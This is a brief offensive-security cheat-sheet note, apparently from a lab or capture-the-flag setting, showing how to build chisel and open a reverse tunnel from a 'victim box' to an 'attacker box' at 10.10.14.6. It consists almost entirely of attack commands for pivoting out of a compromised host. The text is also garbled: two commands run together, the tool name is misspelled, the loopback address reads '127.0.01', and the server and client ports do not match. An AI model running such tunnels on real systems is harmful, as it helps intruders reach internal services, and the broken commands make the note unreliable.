Reverse tunnel with chisel
to install chisel
git clone git@github.com:jpillora/chisel.gitCGO_ENABLED=0 go build⇐ to build chasel as static binary
- In the attacker box
./chisel server -p 9090 --reverse - In the victim box
./chisel client 10.10.14.6 -p 9000 R:8086:127.0.01:8086